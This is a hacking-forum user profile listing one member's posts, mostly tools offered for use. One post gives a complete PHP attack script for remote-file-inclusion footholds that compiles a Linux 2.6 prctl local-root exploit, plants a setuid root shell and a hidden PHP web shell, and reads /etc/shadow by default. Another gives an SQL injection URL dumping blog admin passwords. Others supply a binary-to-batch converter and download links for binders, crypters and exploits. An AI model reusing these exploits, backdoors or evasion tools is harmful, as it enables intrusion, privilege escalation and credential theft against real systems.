Jump to content

alexcargo

Active Members
  • Content count

    122
  • Joined

  • Last visited

Community Reputation

10 Good

About alexcargo

  • Rank
    Registered user
  1. Analizeaza Malware

    http://analysis.seclab.tuwien.ac.at/
  2. Any2Bat

    dupa cum spune si titlu converteaza orice in .bat
  3. PHP KERNEL EXPLOITER

    <?php /* Kernel Exploiter for use in RFI bugs. */ set_time_limit(0); if(isset($_POST['exploit_it'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { if($_POST['compiler'] == "none") { echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; end; } $cc = $_POST['compiler']; $prctl = '#!/bin/sh cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); if (getuid() == 0) { printf("\n[+] We have root!\n\n" ); system("/bin/sh"); system("$_POST[cmd]"); '; if(!stristr($_POST['shell'],"could not be found")) { $prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; } $prctl .= 'system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/core*"); system("exit"); } else { printf("\n[-] Failed.\n\n" ); system("rm -rf '.$_ENV["TMPDIR"].'/s"); } return 0; } __EOF__ '; $phpwrapper = '<?php if(isset($_GET[cmd])) { echo "<pre>"; echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\""); echo "</pre>"; } ?>'; echo "<pre><div align='center'>"; $h = fopen("/tmp/a.sh", "w"); fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit.... "; echo passthru("sh /tmp/a.sh"); echo passthru("$cc -o /tmp/s /tmp/s.c"); echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); echo "Running exploit...waiting about 4 minutes to see if exploit worked "; echo passthru("/tmp/getsuid"); echo passthru("/tmp/s"); echo "Cleaning up "; echo passthru("rm -rf /tmp/getsuid*"); echo passthru("rm -rf /tmp/s.c"); echo passthru("rm -rf /tmp/a.sh"); echo "Done! </div> </pre>"; } else { echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); } } else { ?> <div align="center"> <h4>PHP Attack Script</h4> <h5><?php echo php_uname(); ?></h5> <pre><div align="center"> Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> Checking for cc or gcc............<?php $path = explode(":",$_ENV["PATH"]); $gotcc = FALSE; $gotgcc = FALSE; foreach($path as $dir) { if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { $gotcc = TRUE; $pathtocc = $dir."/cc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { $gotgcc = TRUE; $pathtogcc = $dir."/gcc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } } if($gotcc == FALSE && $gotgcc == FALSE) { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } ?> Checking for execute permissions..<?php $h = fopen("/tmp/test.sh","w"); fwrite($h,"#!/bin/sh"); fclose($h); system("sh /tmp/test.sh",$returnval); if($returnval == 0) { echo '[ <font color="#00CC00">OK</font> ]'."\n"; } else { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } passthru("rm -rf /tmp/test.sh"); ?> </pre></div> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Prctl 2.6.x exploit</option> </select> </td> </tr> <tr> <td><div align="right">Location and name for root shell:</div></td> <td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> </tr> <tr> <td><div align="right">Location and name for php shell wrapper: </div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> </tr> <tr> <td><div align="right">Commands to perform while root seperate multiple commands with ; : </div></td> <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> </tr> </table> </div> <div align="center"> <input type="hidden" name="compiler" value="<?php if(isset($pathtocc)) { echo $pathtocc; } elseif(isset($pathtogcc)) { echo $pathtogcc; } else { echo 'none'; } ?>" /> <input type="hidden" name="exploit_it" value="doit" /> <input name="submit" type="submit" value="Submit" /> After pressing submit it may take up to 4 minutes for the page to load depending on exploit. This is due to the exploit being run. If exploit fails the system may be patched or kernel may not be vuln. </div> </form> <?php } ?>
  4. milw0rm php shell public

    mersi ping dar eu am gasit chestia asta nu facuta de mine uni au facu phpshell asta si ia zis asa milw0rm nu e official dar in alte parti pe alte forumuri lumea imi sare in cap dar ei nu inteleg bine cuvantul sharing ma rog nu dau 2 bani pe ei.
  5. Scan your network for devices online

    Are you aware of all the devices – USB sticks, CDs, floppies, smartphones, MP3 players, handhelds, iPods, digital cameras – that have been connected to your network? As an administrator, do you know how many employees have been using or are using portable storage devices at the moment? Monitoring your network for these devices is not only time-consuming but nearly impossible to do manually. http://www.endpointscan.com/
  6. milw0rm php shell public

    http://www.mytempdir.com/1314256 misto imi place :wink: Enjoy
  7. Word Exe Exploiter

    http://www.mytempdir.com/1314235
  8. OBlog 4.x (JS.ASP)

    Google dork inurl:/blog/js.asp http://www.site.com/blog/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
  9. DNS Exploit Compilat 1si 2

    Exploitu 1 http://www.mytempdir.com/1314191 Exploitu 2 http://www.mytempdir.com/1314292 Enjoy :wink:
  10. Any2Bat

    on error resume next set arg=wscript.arguments if arg.count=0 then wscript.quit with CreateObject("ADODB.Stream") .type=1:.open:.loadfromfile arg(0):bs=.read:l=.size:.close end with if err.number<>0 then wscript.quit set fso=CreateObject("Scripting.FileSystemObject") with fso.opentextfile(arg(0)&".bat",2,true) if err.number<>0 then wscript.quit .writeline "@echo bs=_>xx.vbs" for k=1 to l step 129 .write "@echo """ .write b64b(midb(bs,k,129)) .writeline """+_>>xx.vbs" next .writeline "@echo """":set rs=CreateObject(""ADODB.Recordset"")>>xx.vbs" .writeline "@echo set ado=CreateObject(""ADODB.Stream"")>>xx.vbs" .writeline "@echo l=len(bs):ss="""":for k=1 to l step 4096:ss=ss+ub64(mid(bs,k,4096)):next:l=len(ss)>>xx.vbs" .writeline "@echo rs.fields.append ""b"",205,l/2:rs.open:rs.addnew:rs(""b"")=ss+chrb(0):rs.update>>xx.vbs" .writeline "@echo ado.mode=3:ado.type=1:ado.open:ado.write rs(""b"").getchunk(l/2)>>xx.vbs" .writeline "@echo ado.savetofile """+fso.getfilename(arg(0))+""",2:ado.close>>xx.vbs" .writeline "@echo function ub64(s):dim t(4),b(3):ub64="""":n=len(s):r=2 >>xx.vbs" .writeline "@echo if n mod 4^<^>0 then exit function:end if:for i=1 to n step 4:for j=0 to 3 >>xx.vbs" .writeline "@echo a=asc(mid(s,i+j,1)):if a=43 then:a=62:else if a=47 then:a=63:else if a^>47 and a^<58 then:_>>xx.vbs" .writeline "@echo a=a+4:else if a=61 then:a=0:if r=2 then r=j-2:end if:else if a^>64 and a^<91 then:_>>xx.vbs" .writeline "@echo a=a-65:else if a^>96 and a^<123 then:a=a-71:else:exit function:_>>xx.vbs" .writeline "@echo end if:end if:end if:end if:end if:end if:t(j)=a:next>>xx.vbs" .writeline "@echo b(0)=t(0)+t(1)*64 mod 256:b(1)=t(1)\4+t(2)*16 mod 256:b(2)=t(2)\16+t(3)*4 >>xx.vbs" .writeline "@echo for j=0 to r:if b(j)^<16 then ub64=ub64+""0"":end if:ub64=ub64+hex(b(j))>>xx.vbs" .writeline "@echo next:next:end function>>xx.vbs&&cscript.exe //nologo xx.vbs&del xx.vbs" end with const b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" function b64b(bin) b64b="" n=lenb(bin) for i=1 to n step 3 a=ascb(midb(bin,i,1)) b64b=b64b+mid(b64,a mod 64+1,1) if i b=ascb(midb(bin,i+1,1)) b64b=b64b+mid(b64,(a\64+b*4)mod 64+1,1) if i+1 c=ascb(midb(bin,i+2,1)) b64b=b64b+mid(b64,(b\16+c*16)mod 64+1,1) b64b=b64b+mid(b64,c\4+1,1) else b64b=b64b+mid(b64,b\16+1,1) b64b=b64b+"=" end if else b64b=b64b+mid(b64,a\64+1,1) b64b=b64b+"==" end if next end function copiatil intr-un fisier text si salvati ca Any2Bat.vbs sau cu ce nume doriti
  11. aici este video tutorialul http://thinstall.com/demos/vs_intro.zip ENjoy
  12. mucki's protector

    un un protector pe http://www.mytempdir.com/1300600
  13. ABC joiner v1.23 + Source

    un binder plus codu sursa http://www.mytempdir.com/1300595
  14. gbinder v1.0 2007

    un binder http://www.mytempdir.com/1300593
  15. RPolyCrypt 1.0b

    bun cryptor http://www.mytempdir.com/1300591
×